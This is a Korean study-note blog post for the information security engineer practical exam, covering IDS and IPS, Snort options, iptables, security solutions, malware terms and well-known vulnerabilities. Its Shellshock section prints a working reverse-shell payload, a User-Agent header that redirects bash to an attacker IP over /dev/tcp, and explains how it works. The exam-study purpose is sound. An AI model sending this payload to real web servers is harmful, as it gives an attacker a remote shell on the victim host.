침입탐지시스템(IDS: Intrusion Detection System)
기본 용어 ★
* 오용 탐지(misuse detection)
: 알려진 공격 행위에 대한 패턴(시그너처)을 등록하여 패턴에 일치하면 탐지하는 방식으로 상대적으로 오탐률이 낮은 장점이 있지만 알려지지 않은 새로운 공격을 탐지하지 못하는 단점이 있다.
* 이상 탐지(anomaly detection)
: 공격 패턴을 등록하는 방식이 아니라 정상 행위에 대한 정량적인 또는 통계적인 분석을 통해 이를 벗어난 행위에 대해 공격 행위로 탐지하는 방식으로 알려지지 않은 새로운 공격도 탐지할 수 있는 장점이 있지만 상대적으로 오탐률이 높은 단점이 있다.
* 오탐(false positive)
: 정상적인 행위를 비정상적인(공격) 행위로 탐지하는 오류
* 미탐(false negative)
: 비정상적인(공격) 행위를 정상적인 행위로 탐지하는 오류
호스트 기반 IDS(HIDS: Host based IDS)
- 호스트에 설치되어 호스트 정보(호스트의 자원 사용 실태, 로그 등)를 수집하여 탐지 활동을 수행하는 IDS
- 관리자 권한을 획득하거나 시스템을 변조하는 등의 내부 공격을 탐지
- 예) 트립와이어(tripwire)
네트워크 기반 IDS(NIDS: Network based IDS)
- 네트워크 트래픽(패킷)을 수집하여 탐지 활동을 수행하는 IDS
- 취약점 스캐닝, 네트워크 공격 등을 탐지
- 예) 스노트(Snort), 수리카타(Suricata)
스노트(Snort)
- 단일 스레드
11('18), 13('19), 14('19), 17('21)
| 옵션 ★ | 설명 |
|---|---|
| msg | 메시지 로깅 시 이벤트 명을 지정 |
| content | 페이로드에서 검사할 문자열을 지정 문자열은 text 형식일 수도 있고 binary 형식(헥사값)일 수 있으며 두 개가 복합된 형태일 수 있음 |
| offset | 페이로드에서 content 패턴을 검사할 시작 위치로 페이로드의 첫 번째 바이트 위치가 0부터 시작 |
| depth | 페이로드에서 content 패턴을 검사할 끝 위치 |
| distance | 이전 content 매칭 이후, 패턴 검사를 시작할 상대 위치 |
| within | 이전 content 매칭 이후, 패턴 검사를 끝낼상대 위치 |
| nocase | content 내용과 패킷 페이로드의 패턴 매칭 시 대소문자를 구별하지 않음 |
| threshold | threshold:type limit => 이벤트까지 threshold:type threshold => 이벤트마다 threshold:type both => 이벤트 시 한번 |
4('14)
* any any 의 경우 장비에 많은 부하를 발생시킴, 범위를 제한해서 부하를 낮출 필요가 있음
수리카타(Suricata)
- 오픈소스 기반의 침입탐지시스템(IDS) 및 침입방지시스템(IPS)으로 스노트(Snort)를 기반으로 점을 개선하고 장점을 수용함
- 멀티 코어 및 멀티 스레드 지원
- 스노트(Snort) 룰 완벽 호환 및 대부분 기능을 지원
- 하드웨어 벤더의 개발 지원으로 하드웨어 가속 지원
- 스크립트 언어(Lua) 지원
보안 솔루션
NAC(Network Access Control) ★
: 기업/조직의 엔드포인트(Endpoint) 단말기가 내부 네트워크에 접속을 시도할 때 이를 제어하고 통제하는 역할을 하는 보안 솔루션으로 단말기에 대한 보안 무결성 점검, 네트워크 제어 및 통제 기능을 통해 내부 네트워크가 바이러스나 웜 등의 보안 위협으로부터 안전한 단말기들로 이루어질수 있도록 강제하는 기능을 수행
예) PacketFence, FreeNAC
인라인(inline) 방식
: 물리적인 네트워크 경로상에 위치하여 연결된 네트워크를 통과하는 모든 트래픽(패킷)이 장비를 거쳐가도록(통과하도록) 설치하는 모드
: [장점] 실제 트래픽(패킷)이 장비를 거쳐가기 때문에 실시간 탐지뿐만이 아니라 차단까지 가능함
: [단점] 물리적인 네트워크 경로상에 위치하기 때문에 네트워크 구성 변경이 필요하고 장비 장애 시 전체 네트워크 장애를 유발할 수 있음
미러링(mirroring) 방식
: 아웃오브패스(out-of-path) 방식이라고도 함
: 물리적인 네트워크 경로 밖에 위치하여 미러링 장비(패킷을 복제해주는 장비)로부터 복제된 트래픽(패킷)을 받아서 처리하도록 설치하는 모드
: [장점] 물리적인 네트워크 경로 밖에 위치하기 때문에 네트워크 구성 변경이 불필요하고 장비 장애 시 전체 네트워크 장애를 유발하지 않음
: [단점] 복제된 트래픽(패킷)을 받아서 탐지하기 때문에 실시간 차단이 어려움
iptables
: 패킷 필터링(Packet Filtering) 기능을 제공하는 리눅스 커널에 내장된 netfilter 기능을 관리하기 위한 툴로 룰(rule) 기반의 패킷 필터링 기능을 제공함
: 정책(룰셋)은 위에서 아래로 순차적으로 적용됨
18('21), 21('22)
| 옵션 | 설명 |
|---|---|
| -A | INPUT: inbound 트래픽(INPUT 체인)에 대한 룰 설정 |
| -p | tcp: TCP 패킷 |
| --dport | 목적지 포트 |
| -m | 확장 모듈 connlimit: 동일 출발지 IP의 동시 연결개수에 대한 제한 목적의 모듈 recent: 지정한 시간 범위 내 동일 출발지 IP의 연결 요청개수에 대한 제한 목적의 모듈 |
| -j | DROP: 패킷 차단 후 아무런 응답 메시지도 전송하지 않음 REJECT: 패킷 차단 후 ICMP 에러 메시지를 응답 |
패킷 필터링 장비
18('21)
ingress 필터링
: 외부에서 내부 네트워크로 들어오는 패킷에 대하여 출발지 IP를 체크하여 외부에 존재할 수 없는 IP(사설 IP, 루프백 IP 등 인터넷상에서 사용되지 않는 IP 대역)를 필터링 하는 기법
egress 필터링
: 내부에서 외부 네트워크로 나가는 패킷에 대해 출발지 IP를 체크하여 내부에서 관리(사용)하는 IP 주소(또는 IP 주소 대역)이 아니라면 조작된 주소로 판단하고 필터링하는 기법
Tiny Fragment 공격
: TCP/UDP 포트 정보가 포함되지 않을 정도로 최초의 IP 단편을 아주 작게 만들어 패킷 필터링 장비(방화벽, 침입탐지시스템 등)를 우회하기 위한(포트 기반의 탐지를 못하고 통과시키도록 하기 위한) 목적을 가지는 공격
Fragment Overlap 공격
: 첫 번째 단편은 패킷 필터링 장비에서 허용하는 포트번호를 사용하고 두 번째 단편에서는 offset을 조작해서 재조합될 때 공격자가 원하는 포트로 첫 번째 단편의 포트번호를 덮어쓰는 형태의 공격
상태 검사(Stateful Inspection) 패킷 필터링 방화벽
: 통과하는 모든 패킷에 대하여 프로토콜별 연결 상태(세션) 정보를 추적하여 허용된 연결 상태에 있는 패킷에 대해서는 추가적인 룰셋 검사 없이 모두 허용하고 연결을 가장하여 접근하는 패킷에 대해서는 차단할 수 있음
웹 방화벽
- CASTLE
- 한국인터넷진흥원(KISA)에서 제공하는 공개 웹 방화벽
- WebKnight
- AQTRONIX(아큐트로닉스)사에서 개발한 마이크로소프트(MS)사의 IIS 웹서버에서 동작하는 공개 웹 방화벽
- ISAPI(Internet Server API) 필터 형태로 동작하며, IIS 웹서버 앞단에 위치하여 모든 웹 요청에 대해 필터 정책에 따라 웹 공격을 탐지 및 차단해주는 기능 제공
- ModSecurity
- Trustwave(트러스트웨이브)사의 SPiderLabs에 의 해 개발된 Apache, IIS 등의 웹서버에서 동작하는 공개 방화벽
- 웹 애플리케이션 공격에 대한 탐지 및 차단 기능뿐만이 아니라 웹 애플리케이션에 대한 실시간 모니터링 및 로그 분석 기능을 제공
- 일반적으로 OWASP의 RuleSet 또는 Trustwave사의 SpiderLabs 상용 RuleSet 적용이 가능
EDR(Endpoint Detection Response)
: PC, 모바일, 서버 등 엔드포인트(Endpoint)에서 발생하는 악성 행위를 실시간으로 감지하고 이를 분석 및 대응하여 피해확산을 막는 솔루션(제품)
: 알려지지 않은 보안 위협에 대한 사전 대응과 보안 담당자에게 엔드포엔트에 대한 가시성을 제공
SIEM(Security Information & Event Management)
: ESM의 진화된 형태로 보안장비뿐만이 아니라 각종 서버 장비, 네트워크 장비, 애플리케이션 등 다양한 범위에서 발생하는 로그와 이벤트를 수집하여 빅데이터 기반의 상관관계 분석을 통해 위협을 사전에 차단하는 통합보안관제 솔루션
1) 데이터 통합: 다양한 원천에서 발생하는 보안 정보(이벤트, 로그 등)를 수집하여 통합
- 정보(로그) 수집: 관리 대상 장비에 설치된 에이전트 또는 SNMP, syslog 방식 등을 이용하여 정보(로그) 수집
- 정보(로그) 변환: 다양한 정보(로그) 표현방식을 표준 형식으로 변환하는 과정
2) 상관관계 분석: 수집한 보안 정보를 유용한 정보로 만들기 위해 다양한 상관관계 분석 기능을 제공 - 정보(로그) 분류: 이벤트 발생 누적 횟수 등 유사한 정보를 기준으로 그룹핑하여 단일 정보로 취합하는 과정
- 정보(로그) 분석: 여러 개의 정보 간 연관성을 분석하는 과정
3) 알림: 이벤트 발생 시 보안 담당자에게 자동으로 알림
4) 대시보드: 분석한 결과에 대한 시각화, 조회 등의 기능을 제공
보안장비의 계정관리 취약점 측면에서 조치해야 할 사항
12('18)
- 보안장비 default 계정 변경
- 보안장비 default 패스워드 변경
- 보안장비 계정별 권한 설정
- 보안장비 계정 관리
사이버 위협 인텔리전스(CTI: Cyber Threat Intelligence)
: 단순한 위협 정보가 아닌 지능적 위협 정보를 말함
: 다양한 내/외부 조직에서 경험한 보안 위협 정보를 전문가 집단이 수집 및 분석하여 만들어 내는 증거 기반 위협 정보로 공격자, 공격 절차, 공격 방법(도구), 업무 영향도, 공격 탐지 및 대응 방법 등 다양한 정보를 포함
: SIEM, SOAR 등 보안관제(운영/관리) 솔루션에서 '사이버 위협 인텔리전스(또는 위협 인텔리전스)'와 연동하여 보안 위협의 분석 및 대응에 활용
사이버 위기 경보
: 국가사이버안전센터(NCSC: National Cyber Security Center)에서는 "국가사이버안전관리규정"에 의거 사이버공격에 체계적으로 대응하기 위해 파급영향, 피해 규모 등을 고려하여 수준에 따라 사이버 위기 경보를 발령
| 단계 | 설명 |
|---|---|
| 정상 | 전 분야 정상적인 활동 단계 |
| 관심 | 해외 사이버공격 피해가 확산하여 국내 유입이 우려되며 웜/바이러스, 해킹 등에 의한 피해 발생 가능성이 증가하고 있는 상황으로 사이버 위협 징후에 대한 탐지 활동 강화가 필요한 단계 |
| 주의 | 침해사고가 일부 기관에서 발생했거나 다수 기관으로 확산할 가능성이 증가하고 있는 상황으로 국가 정보시스템 전반에 보안 태세 강화가 필요한 단계 |
| 경계 | 침해사고가 다수 기관에서 발생했거나 대규모 피해로 발전될 가능성이 증가하고 있는 상황으로 다수 기관의 공조 대응이 필요한 단계 |
| 심각 | 침해사고가 전국적으로 발생했거나 피해 규모가 대규모인 사고가 발생한 상황으로 국가적 차원에서 공동 대처가 필요한 단계 |
Wireshark
필터(Filter)
캡처 필터(Capture Filter)
: 실시간 패킷을 캡처할 때 사용하는 필터로 BPF(Berkeley Packet Filter) 구문을 사용
디스플레이 필터(Display Filter)
: 캡처된 파일에서 원하는 패킷을 필터링할 때 사용하는 필터로 와이어샤크 고유한 구문을 사용
| 필터 구문 | 설명 |
|---|---|
| dns.flags.response | 0: 질의(query) 1: 응답(response) |
| dns.flags.authoritative | 0: recursive 네임 서버의 캐시에 저장된 응답 1: authoritative 네임서버로부터의 응답 |
| dns.flags.recdesired | 0: 반복(iterative) 질의/응답 1: 재귀(Recursive) 질의/응답 |
보안 취약점 점검 도구
트립와이어(Tripwire)
: 파일시스템의 무결성을 점검하는 대표적인 도구로 오픈소스 도구
: 파일시스템 무결성 점검이란 파일시스템의 상태 추적 및 허가받지 않은 변경 여부를 주기적으로 점검하여 의심스러운 변화가 감지되면 이를 검사하고 복구하는 과정
네서스(Nessus)
: 미국 테너블(Tenable)사가 개발/배포하는 취약점 점검 도구(스캐너)로 로컬 또는 원격지에서 다양한 방법을 통해 시스템, 네트워크, 웹 애플리케이션 등의 알려진 취약점에 대한 점검을 수행하며 점검을 통해 취약점의 내용과 해결 방법을 상세하게 제공
닉토(Nikto)
: 웹서버 또는 웹 애플리케이션 취약점을 점검할 수 있는 공개 점검 도구(스캐너)로 방대한 취약점 데이터베이스를 이용하여 다양한 형태의 취약점을 스캔
기본 도구들
11('18)
| 명령어 | 설명 |
|---|---|
| find / -mtime -7 | 최상위 디렉터리(/) 이하에서 7일 이내에 변경된 파일을 찾아라 |
| find / -user root -perm -4000 | 최상위 디렉터리(/) 이하에서 root 소유이고 setuid가 설정된 파일을 찾아라 |
| tcpdump -i eth0 "host 192.168.56.100 and host 192.168.56.20" | tcpdump를 이용하여 eth0 인터페이스로 A-Host(IP: 192.168.56.100)와 B-Host(IP:192.168.56.20) 호스트 사이에 오가는 패킷을 전부 출력해라 |
strace
: 유닉스/리눅스 시스템에서 특정 프로그램(실행파일)의 시스템 콜(system call)과 시그널(signal)을 추적하는데 사용하는 디버깅 도구
: strace -e trace=open ps ps 프로그램에 대하여 open 시스템 콜을 추적해 출력
루트킷
: 해커들이 지속해서 자신의 존재를 숨기고 루트 권한을 획득과 백도어 등의 기능을 수행하는 코드와 프로그램의 집합
: ps와 같은 중요한 시스템 실행파일을 변조하여 자신의 실행 프로세스를 은닉하는 경우가 발생하는데 이를 탐지하기 위한 다양한 루트킷 탐지 프로그램들이 존재
: 루트킷 탐지 프로그램들은 ps를 실행하여 보이는 정보와 /proc 디렉터리에 있는 프로세스 정보를 비교하여 숨겨진 프로세스가 있는지를 검사
- proc 파일시스템은 디스크가 아닌 메모리 영역에 존재하는 파일시스템으로 부팅 시 /proc 디렉터리에 마운트
- 유닉스/리눅스 계열 운영체제에서 프로세스와 다양한 시스템 정보를 계층적 파일 구조 형식으로 보여주는 특별한 파일시스템
/proc/<pid>/exe는 프로세스의 실행파일명 및 경로를 확인할 수 있는 심볼릭링크 파일로 경소상에 파일이 삭제된 경우 위 (deleted)로 표시됨/proc/<pid>/cmdline은 프로세스를 실행한 명령어 및 전달 인자(argument)를 담고 있는 파일
쉘 코드(Shell Code)
: 어셈블리어(기계어)로 작성된 작은 크기의 코드로 좁은 의미의 쉘 코드는 쉘(바인드 또는 리버스 형태의 쉘)을 실행시키는 코드를 의미하며 넓은 의미의 쉘 코드는 쉘을 실행시키는 것뿐만이 아니라 공격자가 원하는 작업을 수행하는 다양한 형태의 코드를 의미
| 어셈블리 코드 | 설명 |
|---|---|
| RET | x86 계열에서 ESP 레지스터가 가리키는 값을 EIP 레지스터로 이동 |
Windows PE(Portable Executable) 파일
: 윈도우 운영체제에서 사용하고 있는 실행파일 구조로 실행파일이 적재되는 가상주소, Import/Export API 목록, 코드, 데이터 등의 정보를 관리하기 위해 파일 첫 부분에 여러 가지 구조체로 구성되어 있음
IMAGE_SECION_HEADER
| 섹션 이름 | 설명 |
|---|---|
| .text | 프로그램 실행 코드를 담고 있는 섹션 |
| .data | 읽기 쓰기가 가능한 데이터 섹션으로 전역변수와 정적변수 등이 위치 |
| .rdata | 읽기 전용 데이터 섹션으로 상수형 변수, 문자열 상수 등이 위치 |
| .bss | 초기화되지 않은 전역변수가 위치 |
| .idata | 임포트(Import)할 DLL과 그 API/함수들에 대한 정보를 담고 있는 섹션 |
| .edata | 익스포트(Export)할 DLL과 그 API/함수들에 대한 정보를 담고 있는 섹션 |
| .rsrc | 다이얼로그, 아이콘, 커서 등의 윈도우 애플리케이션 리소스 관련 데이터들을 담고 있는 섹션 |
악성코드
* 멀버타이징(Malvertising)
: 악성코드(Malware)와 광고(Advertising)의 합성어로 온라인 광고를 이용하여 악성코드를 전파하는 기법
* 드롭퍼(Dropper)
: 일반적인 다운로더가 아닌 사용자가 인식하지 못하는 순간에 악성코드를 생성하며 사용자의 시스템 내부/외부에서 다양한 경로로 악성코드를 감염시킴
* 인젝터(Injector)
: 드롭퍼의 특수한 형태로 파일을 생성하지 않고 자신의 데이터를 이용해 바로 새로운 프로세스를 생성하여 메모리에 상주시키는 형태의 악성코드
* YARA(야라)
: 악성코드에 포함된 텍스트 또는 바이너리 패턴 정보(시그니처)를 이용하여 악성코드를 식별하고 분류할 수 있는 오픈소스 프로젝트 도구로 단순히 텍스트 또는 바이너리 패턴뿐만이 아니라 파일이나 프로세스의 오프셋, 가상 메모리 주소 활용 및 정규표현식 등을 이용하여 다양한 룰을 생성할 수 있음
: 바이러스 토탈(Virus Total)에서 제작하였으며 오픈소스로 관리되고 있음
* 분석 기법
5('15)
** 정적(static) 분석
: 프로그램의 기능을 파악하고 코드나 프로그램의 구조를 분석
** 동적(dynamic) 분석
: 안전한 샌드박스(sandbox) 환경에서 프로그램의 다양한 입력값을 전달하며 실행시켜 그 결과를 이용하여 분석
공격/취약점
공급망 공격(Supply chain Attack)
: S/W 개발사의 네트워크에 침투하여 소스코드를 수정하여 악의적인 목적의 코드를 삽입하거나 배포를 위한 서버에 접근하여 악의적인 파일로 변경하는 방식을 통해 사용자 PC에서 소프트웨어 설치 또는 업데이트 시에 자동으로 하는 공격
DDE(Dynamic Data Exchange)
: 마이크로소프트 오피스 응용 프로그램 간 데이터 전달을 위해 제공하는 프로토콜
: VBS 매크로 코드를 이용하지 않고 악성 기능을 수행할 수 있음
APT 공격
: 기존 불특정 다수를 대상으로 하는 해킹 기법과는 달리 정치적/사회적/경제적/기술적/군사적으로 중요한 특정 대상을 정하여 공격하며 장기적으로 정보를 수집하고 지속적으로 치밀한 공격을 감행하며 목표 달성에 필요하다면 내부 직원 이용, 사회공학 기법 활용 등의 복합적이고 지능적인 공격 수법
SSDP 증폭 반사 공격
: 증폭/반사(Amplification/Reflection) 공격의 일종으로 1900/udp 포트를 사용하며 공개된 IoT(Internet of Things) 기기 검색 요청을 조작해 기기로부터 발생하는 상대적으로 큰 응답 패킷이 희생자 호스트에게 전달되어 서비스 거부를 유발시킴
: SSDP(Simple Service Discovery Protocol)을 악용하는 공격
쉘쇼크(Shell Shock)
7('16)
: OpenSSL 하트블리드(HeartBleed) 취약점 이후 아래에 같이 인터넷을 통해 간단한 명령만으로 시스템을 장악할 수 있는 심각한 취약점
: "() {"로 시작하는 함수 선언문 끝에 임의의 명령어를 추가로 삽입하여 환경변수에 저장할 경우 삽입한 명령어까지 실행 가능
User-Agent:() { :; }; /bin/bash > /dev/tcp/10.10.10.10/8081 0<& 1- 공격자의 CGI 요청을 통해 실행되는 Bash의 표준입력과 표준출력이 TCP 클라이언트 소켓으로 재지정(redirection)되고 TCP 클라이언트 소켓은 공격자(IP:10.10.10.10)의 리스닝 포트(Port:8081)로 접속하기 때문에 공격자는 타겟 웹서버의 Bash에 접근할 수 있다.
- 즉, 쉘쇼크(ShellShock) 취약점을 이용하여 타겟 웹서버에 리버스 쉘(Reverse Shell) 연결을 위한 공격을 하고 있다.
DBD(Drive By Download) 공격
5('15)
: 최초 접속지에서 여러 경유지로 접속을 유도하여, 최종 유포지에서 악성코드를 다운로드 시킴
SSL/TLS 관련 주요 취약점
하트블리드(HeartBleed)
8('16)
: 하트비트(HeartBeat)라는 SSL/TLS 확장 프로토콜을 구현하는 과정에서 발생한 취약점
: 취약점이 발견된 OpenSSL 버전이 설치된 서버에서 인증정보 등이 저장된 64Kbyte 크기의 메모리 데이터를 외부에서 아무런 제한 없이 탈취할 수 있음
: 웹서버로 전송된 개인정보, 비밀번호 등을 물론 웹서버의 암호키도 탈취될 수 있음
POODLE
: SSL/TLS 협상 시 버전 다운그레이드 공격을 통해 SSLv3.0을 사용하도록 강제한 후 중간자 공격(MITM: Man In The Middle)을 통해 암호화되어 송수신되는 정보를 탈취하는 공격
: SSLv3.0의 블록 암호화 기법인 CBC 모드를 사용하는 경우 발생하는 패딩된 암호화 블록이 MAC(메시지인증코드)에 의해 보호되지 않는 취약점을 이용
사이버 킬 체인(Cyber Kill Chain)
: APT(Advanced Persistence Threat) 공격에 대한 대비책
: 미국 록히드 마틴사가 정식 명칭을 특허로 등록
: 군사용으로 적 미사일 기지에 대한 선제공격을 의미하며, 사이버공격에 대한 선제 대응책으로 사회적인 이슈로 대두되기도 하였음
: 사이버상 공격자의 공격단계 중 하나를 사전에 제거하면 실제 공격까지 이어지지 않는다는 점에서 착안한 방어 전략
MITRE(마이터)
ATT&CK
: 사이버공격의 흐름을 분류하는 기준으로 MITRE(마이터) 사에서는 사이버공격 전략(Tactics) 및 전술(Techniques)에 대한 정보를 기반으로 하는 프레임워크
: 전통적인 사이버 킬 체인(Cyber Kill Chain)의 7단계를 확장한 모델로 공격자로부터 발생한 일관된 공격 행동 패턴에 대한 분석을 기반으로 공격자의 행위를 식별해 줄 수 있음
CVE(Common Vulnerability & Exposures)
: 동일한 취약성에 대해 해커와 보안업체 간 다르게 사용해온 명칭을 표준화한 목록
: 공개된 정보보안 취약점 및 노출에 대한 식별정보를 제공
: 과거 업체별 또는 소프트웨어별로 각각 관리되던 보안 버그나 취약점들을 통합해서 관리한다는 의미가 있음
: 도출된 취약점은 MITRE의 테스트를 거쳐 호환성이 충족된 보안제품과 서비스에만 등록할 수 있음
CVSS(Common Vulnerability Scoring System)
: 보안 취약점 관리 체계인 CVE(Common Vulnerabilities & Exposures)의 요소 중 하나로 보안취약점이 동작하는 환경, 절차 및 파급력 등을 고려해 취약점의 심각한 정도를 평가하는(수치화하는) 공개 프레임워크
CWE(Common Weakness Enumeration)
: MITRE 사가 중심이 되어 여러 업체와 연구기관이 협력하여 소프트웨어에서 공통으로 발생하는 약점(취약점)을 체계적으로 분류한 목록으로 소프트웨어 개발 생명 주기(SDLC: Software Development Life Cycle)에서 발생할 수 있는 모든 약점 목록(설계, 아키텍처, 코드 단계 등)을 포함함
CWSS(Common Weakness Scoring System)
: CWE에 등록된 취약점의 위험성을 정량화하기 위한 점수 체계
'0x60 Study > 0x62 정보보안기사' 카테고리의 다른 글
| 실기 기출 정리 (02. 네트워크 보안) (0) | 2023.04.22 |
|---|---|
| 실기 기출 정리 (05. 정보보안 일반) (0) | 2023.04.22 |
| 실기 기출 정리 (06. 정보보안관리/법규) ★ (1) | 2023.04.21 |